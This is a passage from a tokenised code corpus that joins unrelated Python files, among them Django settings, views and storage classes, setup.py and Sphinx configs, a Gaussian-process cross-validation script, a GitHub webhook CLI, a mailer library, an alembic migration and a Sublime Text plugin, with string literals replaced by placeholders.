. get_valid_name ( name , * args , ** kwargs ) <EOL> def get_available_name ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . get_available_name ( name , * args , ** kwargs ) <EOL> def path ( self , name , * args , ** kwargs ) : <EOL> return super ( TestStorageMixin , self ) . path ( name , * args , ** kwargs ) <EOL> def delete ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . delete ( name , * args , ** kwargs ) <EOL> def exists ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . exists ( name , * args , ** kwargs ) <EOL> def listdir ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . listdir ( name , * args , ** kwargs ) <EOL> def size ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . size ( name , * args , ** kwargs ) <EOL> def url ( self , name , * args , ** kwargs ) : <EOL> return super ( TestStorageMixin , self ) . url ( name , * args , ** kwargs ) <EOL> def accessed_time ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . accessed_time ( name , * args , ** kwargs ) <EOL> def created_time ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . created_time ( name , * args , ** kwargs ) <EOL> def modified_time ( self , name , * args , ** kwargs ) : <EOL> slog . debug ( '<STR_LIT>' % name ) <EOL> return super ( TestStorageMixin , self ) . modified_time ( name , * args , ** kwargs ) <EOL> class TestStorage ( TestStorageMixin , FileSystemStorage ) : <EOL> pass </s>
<s> from __future__ import print_function <EOL> from builtins import str <EOL> from builtins import range <EOL> import pyGPs <EOL> from pyGPs . Validation import valid <EOL> import numpy as np <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) <EOL> data_source = "<STR_LIT>" <EOL> x = [ ] <EOL> y = [ ] <EOL> with open ( data_source ) as f : <EOL> for index , line in enumerate ( f ) : <EOL> feature = line . split ( '<STR_LIT:U+002C>' ) <EOL> attr = feature [ : - <NUM_LIT:1> ] <EOL> attr = [ float ( i ) for i in attr ] <EOL> target = [ feature [ - <NUM_LIT:1> ] ] <EOL> x . append ( attr ) <EOL> y . append ( target ) <EOL> x = np . array ( x ) <EOL> y = np . array ( y ) <EOL> n , D = x . shape <EOL> for i in range ( n ) : <EOL> if y [ i , <NUM_LIT:0> ] [ <NUM_LIT:0> ] == '<STR_LIT:g>' : <EOL> y [ i , <NUM_LIT:0> ] = <NUM_LIT:1> <EOL> else : <EOL> y [ i , <NUM_LIT:0> ] = - <NUM_LIT:1> <EOL> y = np . int8 ( y ) <EOL> K = <NUM_LIT:10> <EOL> ACC = [ ] <EOL> RMSE = [ ] <EOL> cv_run = <NUM_LIT:0> <EOL> for x_train , x_test , y_train , y_test in valid . k_fold_validation ( x , y , K ) : <EOL> print ( '<STR_LIT>' , cv_run ) <EOL> model = pyGPs . GPC ( ) <EOL> model . optimize ( x_train , y_train ) <EOL> ymu , ys2 , fmu , fs2 , lp = model . predict ( x_test , ys = y_test ) <EOL> ymu_class = np . sign ( ymu ) <EOL> acc = valid . ACC ( ymu_class , y_test ) <EOL> print ( '<STR_LIT>' , round ( acc , <NUM_LIT:2> ) ) <EOL> rmse = valid . RMSE ( ymu_class , y_test ) <EOL> print ( '<STR_LIT>' , round ( rmse , <NUM_LIT:2> ) ) <EOL> ACC . append ( acc ) <EOL> RMSE . append ( rmse ) <EOL> cv_run += <NUM_LIT:1> <EOL> print ( '<STR_LIT>' , np . round ( np . mean ( ACC ) , <NUM_LIT:2> ) , '<STR_LIT:(>' + str ( np . round ( np . std ( ACC ) , <NUM_LIT:2> ) ) + '<STR_LIT:)>' ) <EOL> print ( '<STR_LIT>' , np . round ( np . mean ( RMSE ) , <NUM_LIT:2> ) ) <EOL> '''<STR_LIT>''' <EOL> print ( '<STR_LIT>' ) </s>
<s> from setuptools import setup , find_packages <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> author_email = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> packages = find_packages ( ) , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> BASE_DIR = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> DEBUG = True <EOL> ALLOWED_HOSTS = [ ] <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATES = [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> } , <EOL> ] <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : os . path . join ( BASE_DIR , '<STR_LIT>' ) , <EOL> } <EOL> } <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATIC_ROOT = os . path . join ( BASE_DIR , '<STR_LIT>' ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> WEBPACK = { <EOL> '<STR_LIT>' : STATIC_ROOT , <EOL> '<STR_LIT>' : STATIC_URL , <EOL> '<STR_LIT>' : ( <EOL> os . path . join ( BASE_DIR , '<STR_LIT:..>' ) , <EOL> ) , <EOL> '<STR_LIT>' : DEBUG , <EOL> '<STR_LIT>' : DEBUG , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : DEBUG <EOL> } , <EOL> } </s>
<s> import sys <EOL> from django . template import Library <EOL> from optional_django import six <EOL> from . . compiler import webpack <EOL> from . . exceptions import BundlingError <EOL> register = Library ( ) <EOL> @ register . assignment_tag ( name = '<STR_LIT>' ) <EOL> def webpack_template_tag ( path_to_config ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return webpack ( path_to_config ) <EOL> except ( AttributeError , ValueError ) as e : <EOL> raise six . reraise ( BundlingError , BundlingError ( * e . args ) , sys . exc_info ( ) [ <NUM_LIT:2> ] ) </s>
<s> import argparse <EOL> import lintreview . github as github <EOL> import sys <EOL> from flask import url_for <EOL> from lintreview . web import app <EOL> def main ( ) : <EOL> parser = create_parser ( ) <EOL> args = parser . parse_args ( ) <EOL> args . func ( args ) <EOL> def register_hook ( args ) : <EOL> try : <EOL> process_hook ( github . register_hook , args ) <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . stderr . write ( e . message + '<STR_LIT:\n>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def remove_hook ( args ) : <EOL> try : <EOL> process_hook ( github . unregister_hook , args ) <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> sys . stderr . write ( '<STR_LIT>' ) <EOL> sys . stderr . write ( e . message + '<STR_LIT:\n>' ) <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def process_hook ( func , args ) : <EOL> """<STR_LIT>""" <EOL> credentials = None <EOL> if args . login_user and args . login_pass : <EOL> credentials = { <EOL> '<STR_LIT>' : args . login_user , <EOL> '<STR_LIT>' : args . login_pass <EOL> } <EOL> with app . app_context ( ) : <EOL> if credentials : <EOL> credentials [ '<STR_LIT>' ] = app . config [ '<STR_LIT>' ] <EOL> repo = github . get_repository ( <EOL> credentials , <EOL> args . user , <EOL> args . repo ) <EOL> else : <EOL> repo = github . get_repository ( <EOL> app . config , <EOL> args . user , <EOL> args . repo ) <EOL> endpoint = url_for ( '<STR_LIT>' , _external = True ) <EOL> func ( repo , endpoint ) <EOL> def create_parser ( ) : <EOL> desc = """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = desc ) <EOL> commands = parser . add_subparsers ( <EOL> title = "<STR_LIT>" , <EOL> description = "<STR_LIT>" ) <EOL> desc = """<STR_LIT>""" <EOL> register = commands . add_parser ( '<STR_LIT>' , help = desc ) <EOL> register . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> register . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> register . add_argument ( '<STR_LIT:user>' , <EOL> help = "<STR_LIT>" ) <EOL> register . add_argument ( '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> register . set_defaults ( func = register_hook ) <EOL> desc = """<STR_LIT>""" <EOL> remove = commands . add_parser ( '<STR_LIT>' , help = desc ) <EOL> remove . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> remove . add_argument ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> remove . add_argument ( '<STR_LIT:user>' , <EOL> help = "<STR_LIT>" ) <EOL> remove . add_argument ( '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> remove . set_defaults ( func = remove_hook ) <EOL> return parser <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from setuptools import setup , find_packages <EOL> PACKAGE_NAME = "<STR_LIT>" <EOL> VERSION = "<STR_LIT>" <EOL> requirements = open ( '<STR_LIT>' , '<STR_LIT:r>' ) <EOL> setup ( <EOL> name = PACKAGE_NAME , <EOL> version = VERSION , <EOL> description = """<STR_LIT>""" , <EOL> author = "<STR_LIT>" , <EOL> author_email = "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> } , <EOL> install_requires = requirements . readlines ( ) , <EOL> ) </s>
<s> import sys , os <EOL> docs_dir = os . path . dirname ( __file__ ) <EOL> project_dir = os . path . abspath ( os . path . join ( docs_dir , '<STR_LIT:..>' ) ) <EOL> print ( project_dir ) <EOL> sys . path . insert ( <NUM_LIT:1> , project_dir ) <EOL> import textblob_de <EOL> sys . path . pop ( <NUM_LIT:1> ) <EOL> sys . path . append ( os . path . abspath ( "<STR_LIT>" ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = release = textblob_de . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import warnings <EOL> import pkg_resources <EOL> from email import charset <EOL> from functools import partial <EOL> from marrow . mailer . message import Message <EOL> from marrow . mailer . exc import MailerNotRunning <EOL> from marrow . util . compat import basestring <EOL> from marrow . util . bunch import Bunch <EOL> from marrow . util . object import load_object <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> log = __import__ ( '<STR_LIT>' ) . getLogger ( __name__ ) <EOL> class Mailer ( object ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . Manager . __name__ , self . Transport . __name__ ) <EOL> def __init__ ( self , config , prefix = None ) : <EOL> self . manager , self . Manager = None , None <EOL> self . Transport = None <EOL> self . running = False <EOL> self . config = config = Bunch ( config ) <EOL> if prefix is not None : <EOL> self . config = config = Bunch . partial ( prefix , config ) <EOL> if '<STR_LIT>' in config and isinstance ( config . manager , dict ) : <EOL> self . manager_config = manager_config = config . manager <EOL> elif '<STR_LIT>' in config : <EOL> self . manager_config = manager_config = dict ( manager_config ) <EOL> else : <EOL> try : <EOL> self . manager_config = manager_config = Bunch . partial ( '<STR_LIT>' , config ) <EOL> except ValueError : <EOL> self . manager_config = manager_config = dict ( ) <EOL> if '<STR_LIT>' in config and isinstance ( config . manager , basestring ) : <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> manager_config . use = config . manager <EOL> try : <EOL> if '<STR_LIT>' in config and isinstance ( config . transport , dict ) : <EOL> self . transport_config = transport_config = Bunch ( config . transport ) <EOL> else : <EOL> self . transport_config = transport_config = Bunch . partial ( '<STR_LIT>' , config ) <EOL> except ( AttributeError , ValueError ) : <EOL> self . transport_config = transport_config = Bunch ( ) <EOL> if '<STR_LIT>' in config and isinstance ( config . transport , basestring ) : <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> transport_config . use = config . transport <EOL> try : <EOL> if '<STR_LIT:message>' in config and isinstance ( config . message , dict ) : <EOL> self . message_config = Bunch ( config . message ) <EOL> else : <EOL> self . message_config = Bunch . partial ( '<STR_LIT:message>' , config ) <EOL> except ( AttributeError , ValueError ) : <EOL> self . message_config = Bunch ( ) <EOL> self . Manager = Manager = self . _load ( manager_config . use if '<STR_LIT>' in manager_config else '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not Manager : <EOL> raise LookupError ( "<STR_LIT>" % ( config . manager , ) ) <EOL> self . Transport = Transport = self . _load ( transport_config . use , '<STR_LIT>' ) <EOL> if not Transport : <EOL> raise LookupError ( "<STR_LIT>" % ( config . transport , ) ) <EOL> self . manager = Manager ( manager_config , partial ( Transport , transport_config ) ) <EOL> @ staticmethod <EOL> def _load ( spec , group ) : <EOL> if not isinstance ( spec , basestring ) : <EOL> return spec <EOL> if '<STR_LIT::>' in spec : <EOL> return load_object ( spec ) <EOL> for entrypoint in pkg_resources . iter_entry_points ( group , spec ) : <EOL> return entrypoint . load ( ) <EOL> def start ( self ) : <EOL> if self . running : <EOL> log . warning ( "<STR_LIT>" ) <EOL> return <EOL> log . info ( "<STR_LIT>" ) <EOL> self . manager . startup ( ) <EOL> self . running = True <EOL> log . info ( "<STR_LIT>" ) <EOL> return self <EOL> def stop ( self ) : <EOL> if not self . running : <EOL> log . warning ( "<STR_LIT>" ) <EOL> return <EOL> log . info ( "<STR_LIT>" ) <EOL> self . manager . shutdown ( ) <EOL> self . running = False <EOL> log . info ( "<STR_LIT>" ) <EOL> return self <EOL> def send ( self , message ) : <EOL> if not self . running : <EOL> raise MailerNotRunning ( "<STR_LIT>" ) <EOL> log . info ( "<STR_LIT>" , message . id ) <EOL> try : <EOL> result = self . manager . deliver ( message ) <EOL> except : <EOL> log . error ( "<STR_LIT>" , message . id ) <EOL> raise <EOL> log . debug ( "<STR_LIT>" , message . id ) <EOL> return result <EOL> def new ( self , author = None , to = None , subject = None , ** kw ) : <EOL> data = dict ( self . message_config ) <EOL> data [ '<STR_LIT>' ] = self <EOL> if author : <EOL> kw [ '<STR_LIT>' ] = author <EOL> if to : <EOL> kw [ '<STR_LIT:to>' ] = to <EOL> if subject : <EOL> kw [ '<STR_LIT>' ] = subject <EOL> data . update ( kw ) <EOL> return Message ( ** data ) <EOL> class Delivery ( Mailer ) : <EOL> def __init__ ( self , * args , ** kw ) : <EOL> warnings . warn ( "<STR_LIT>" , DeprecationWarning ) <EOL> super ( Delivery , self ) . __init__ ( * args , ** kw ) <EOL> charset . add_charset ( '<STR_LIT:utf-8>' , charset . SHORTEST , charset . QP , '<STR_LIT:utf-8>' ) <EOL> charset . add_charset ( '<STR_LIT:utf8>' , charset . SHORTEST , charset . QP , '<STR_LIT:utf8>' ) </s>
<s> '''<STR_LIT>''' </s>
<s> from __future__ import unicode_literals <EOL> import sys <EOL> from contextlib import contextmanager <EOL> from tempfile import TemporaryFile <EOL> try : <EOL> from io import StringIO <EOL> except ImportError : <EOL> from cStringIO import StringIO <EOL> @ contextmanager <EOL> def capture ( ) : <EOL> old_stdout = sys . stdout <EOL> with StringIO ( ) as tmp : <EOL> sys . stdout = tmp <EOL> try : <EOL> yield tmp <EOL> finally : <EOL> sys . stdout = old_stdout </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> import flask_marshmallow <EOL> sys . path . append ( os . path . abspath ( "<STR_LIT>" ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> intersphinx_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , None ) , <EOL> } <EOL> primary_domain = '<STR_LIT>' <EOL> default_role = '<STR_LIT>' <EOL> issues_github_path = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = release = flask_marshmallow . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_sidebars = { <EOL> '<STR_LIT:index>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> htmlhelp_basename = '<STR_LIT>' </s>
<s> import re <EOL> from setuptools import setup , find_packages <EOL> EXTRA_REQUIREMENTS = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def find_version ( fname ) : <EOL> """<STR_LIT>""" <EOL> version = '<STR_LIT>' <EOL> with open ( fname , '<STR_LIT:r>' ) as fp : <EOL> reg = re . compile ( r'<STR_LIT>' ) <EOL> for line in fp : <EOL> m = reg . match ( line ) <EOL> if m : <EOL> version = m . group ( <NUM_LIT:1> ) <EOL> break <EOL> if not version : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return version <EOL> __version__ = find_version ( "<STR_LIT>" ) <EOL> def read ( fname ) : <EOL> with open ( fname ) as fp : <EOL> content = fp . read ( ) <EOL> return content <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> description = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = ( '<STR_LIT>' , '<STR_LIT>' ) ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> include_package_data = True , <EOL> extras_require = { '<STR_LIT>' : EXTRA_REQUIREMENTS } , <EOL> license = '<STR_LIT>' , <EOL> zip_safe = False , <EOL> keywords = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> def upgrade ( ) : <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) ) <EOL> op . add_column ( '<STR_LIT>' , sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = True ) ) <EOL> def downgrade ( ) : <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> op . drop_column ( '<STR_LIT>' , '<STR_LIT>' ) </s>
<s> import unittest <EOL> from osm_time import get_minutes_from_midnight , clean_value , ParseException <EOL> from osm_time . opening_hours import OpeningHours <EOL> class TestHelpers ( unittest . TestCase ) : <EOL> def test_get_minutes_from_midnight ( self ) : <EOL> self . assertEqual ( get_minutes_from_midnight ( "<STR_LIT>" ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( get_minutes_from_midnight ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> self . assertEqual ( get_minutes_from_midnight ( "<STR_LIT>" ) , <NUM_LIT> ) <EOL> def test_clean_value ( self ) : <EOL> self . assertEqual ( clean_value ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> def test_parse_exception ( self ) : <EOL> self . assertRaises ( ParseException , OpeningHours , "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> try : <EOL> from . helper import H <EOL> except : <EOL> from helper import H <EOL> try : <EOL> from . import settings as S <EOL> except : <EOL> import settings as S <EOL> try : <EOL> from . import view as V <EOL> except : <EOL> import view as V <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:H>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:S>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> from . import BaseResource <EOL> class Buildpack ( BaseResource ) : <EOL> _strs = [ '<STR_LIT:url>' ] <EOL> _pks = [ '<STR_LIT:url>' ] <EOL> def __init__ ( self ) : <EOL> super ( Buildpack , self ) . __init__ ( ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . url ) </s>
<s> import sublime , sublime_plugin <EOL> class PareditPushBracketCommand ( sublime_plugin . TextCommand ) : <EOL> def run ( self , edit ) : <EOL> print '<STR_LIT>' + '<STR_LIT>' <EOL> for region in self . view . sel ( ) : <EOL> pos = self . view . sel ( ) [ <NUM_LIT:0> ] . begin ( ) <EOL> first_closing = None <EOL> first = True <EOL> def search ( openings , pos , first_closing , first ) : <EOL> print "<STR_LIT>" + str ( pos ) + "<STR_LIT:)>" <EOL> quit = <NUM_LIT:0> <EOL> while quit < <NUM_LIT:50> : <EOL> next_opening = self . view . find ( '<STR_LIT>' , pos ) <EOL> print "<STR_LIT>" + str ( next_opening ) <EOL> next_closing = self . view . find ( '<STR_LIT>' , pos ) <EOL> print "<STR_LIT>" + str ( next_closing ) <EOL> if ( next_opening == None ) and ( next_closing == None ) : <EOL> print '<STR_LIT>' <EOL> break <EOL> if ( next_opening != None ) and ( next_opening . begin ( ) < next_closing . begin ( ) ) : <EOL> openings += <NUM_LIT:1> <EOL> pos = next_opening . begin ( ) + <NUM_LIT:1> <EOL> print '<STR_LIT>' + str ( openings ) <EOL> else : <EOL> if ( first_closing == None and openings == <NUM_LIT:0> ) or ( first_closing == None and first == True ) : <EOL> print '<STR_LIT>' <EOL> first_closing = next_closing <EOL> dont_break = True <EOL> else : <EOL> dont_break = False <EOL> if openings - <NUM_LIT:1> >= <NUM_LIT:0> : <EOL> openings -= <NUM_LIT:1> <EOL> print '<STR_LIT>' + str ( openings ) <EOL> else : <EOL> dont_break = True <EOL> print '<STR_LIT>' + str ( openings ) <EOL> pos = next_closing . begin ( ) + <NUM_LIT:1> <EOL> quit += <NUM_LIT:1> <EOL> if openings == <NUM_LIT:0> and dont_break == False : <EOL> print '<STR_LIT>' <EOL> break <EOL> first = False <EOL> if first_closing == None : <EOL> print '<STR_LIT>' <EOL> first_closing = next_closing <EOL> openings , pos , first_closing , next_closing , first = search ( <NUM_LIT:0> , pos , first_closing , first ) <EOL> return openings , pos , first_closing , next_closing , first <EOL> openings , pos , first_closing , next_closing , first = search ( <NUM_LIT:1> , pos , first_closing , first ) <EOL> print "<STR_LIT>" + str ( first_closing ) <EOL> print "<STR_LIT>" + str ( next_closing ) <EOL> if ( first_closing != None ) and ( next_closing != None ) : <EOL> self . view . erase ( edit , first_closing ) <EOL> self . view . insert ( edit , next_closing . begin ( ) , '<STR_LIT:)>' ) <EOL> else : <EOL> print '<STR_LIT>' </s>
<s> from optparse import make_option <EOL> from django . core . management . base import BaseCommand <EOL> from planet . tasks import process_feed <EOL> class Command ( BaseCommand ) : <EOL> help = "<STR_LIT>" <EOL> args = "<STR_LIT>" <EOL> option_list = BaseCommand . option_list + ( <EOL> make_option ( '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , <EOL> dest = '<STR_LIT>' , <EOL> default = None , <EOL> metavar = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> ) <EOL> def handle ( self , * args , ** options ) : <EOL> if not len ( args ) : <EOL> self . stderr . write ( "<STR_LIT>" ) <EOL> exit ( <NUM_LIT:0> ) <EOL> feed_url = args [ <NUM_LIT:0> ] <EOL> process_feed . delay ( feed_url , create = True , category_title = options [ '<STR_LIT>' ] ) <EOL> self . stdout . write ( "<STR_LIT>" ) </s>
<s> from django . core . urlresolvers import reverse , reverse_lazy <EOL> from django . forms import ValidationError <EOL> from django . http import HttpResponseRedirect <EOL> from django . shortcuts import render_to_response , get_object_or_404 , redirect <EOL> from django . template import RequestContext <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views . generic import ListView <EOL> from django . views . generic . detail import SingleObjectMixin <EOL> from django . views . generic . edit import CreateView , DeleteView <EOL> from django . http import Http404 <EOL> from planet . models import Blog , Feed , Author , Post <EOL> from planet . forms import SearchForm <EOL> from tagging . models import Tag , TaggedItem <EOL> def index ( request ) : <EOL> posts = Post . site_objects . all ( ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , { "<STR_LIT>" : posts } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def blogs_list ( request ) : <EOL> blogs_list = Blog . site_objects . all ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : blogs_list } , context_instance = RequestContext ( request ) ) <EOL> def blog_detail ( request , blog_id , slug = None ) : <EOL> blog = get_object_or_404 ( Blog , pk = blog_id ) <EOL> if slug is None : <EOL> return redirect ( blog , permanent = True ) <EOL> posts = Post . site_objects . filter ( feed__blog = blog ) . order_by ( "<STR_LIT>" ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : blog , "<STR_LIT>" : posts } , <EOL> context_instance = RequestContext ( request ) ) <EOL> def feeds_list ( request ) : <EOL> feeds_list = Feed . site_objects . all ( ) <EOL> return render_to_response ( "<STR_LIT>" , <EOL> { 